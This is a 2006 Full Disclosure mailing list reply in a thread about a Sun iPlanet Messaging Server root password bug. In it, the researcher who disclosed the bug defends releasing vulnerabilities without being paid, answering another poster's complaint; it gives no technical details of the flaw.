Full Disclosure mailing list archives

RE: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise]

From: "php0t" <very () unprivate com>
Date: Sat, 17 Jun 2006 22:24:25 +0200

  Excuse me, but what have I done to you?

And why am I only supposed to disclose bugs when somebody pays me for it
?

Can you please explain your rant, so next time I can do -whatever-
different?

And by the way, I'm not 'trying to prove I can find holes', I didn't
spend any time trying to
find a hole in this specific software, I just happened to stumble upon
it in the process
of trying to gain root - after which I decided to disclose this silly
and obvious bug.

So I ask again, is this a problem for you? Am I being ignorant / evil
for posting this vuln?
Just tell me what's up - If your problem is that I do not get paid for
this - well - I am happy
that you are so much after what's best for me but I can do fine on my
own - thanks.

  php0t / zorro.hu

You are wasting your time trying to prove you can find holes in
software that you AREN'T *PAID FOR* FINDING BUGS.
Nice advisory, though.  you spend time on it.

Sincerely,
T.Solo

Summary